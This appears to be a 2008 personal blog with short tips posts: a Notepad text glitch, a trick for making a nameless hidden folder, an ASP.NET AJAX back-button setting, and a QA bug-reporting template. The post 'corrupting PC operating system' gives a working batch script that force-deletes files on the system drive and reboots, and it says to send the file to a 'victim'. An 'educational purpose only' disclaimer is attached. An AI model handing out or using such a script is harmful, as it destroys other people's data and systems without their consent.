Tuesday, November 18, 2008

notepad glitch/hack

Open Notepad, Type:

Bush hid the facts

Close and re-open the file & see some unknown characters appears & notepad is not able to save it

creating hidden folder with no name

1.Create a new folder anywhere

2.Press F2. Hold "ALT" and type:255. Means just space comes instead of name

3.Right click the folder and select "Properties"

4.Then the "Customize" tab

5.Click "Change Icon..."

6.Scroll and find one without icon image, Select it

now keep your movies/songs/personal data there, however you can also make it hidden

corrupting PC operating system

1.Open Notepad
2. Type
@echo offdel %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00
3.save it with anynameyoulike.bat
4.send it to victim
5.If he opens this file, his/her system gets corruped, result is blue screen of death
(Warning: This is for educational purpose only, do not try this. I shall not be responsible for the consequences)

enabling back button for AJAX based page

Set the EnableHistory=”true” for the ScriptManager tag

Tuesday, November 4, 2008

bug reporting skill.

bug reporting skill.
we added the default format into mantis itself, which forces every QA to log the bug in proper manner. e.g.
1. Category: functional/GUI/verfication/non functional/etc.. (around 50 categories)
2. Platform
3. Browsers
4. Title
5. #Fact: (means what is happening)
   #Expected:
6. Steps: (explaining what happened & how)
  1.
  2.
  3....
7. Image
8. Testcase ID
9. UserRole

While bugs are resolved, root cause is also written by developers & closed by testers, at any stage we can have stat of verification & validation.

and and .... Finally at the EOD a bug report is kicked towards development team :-)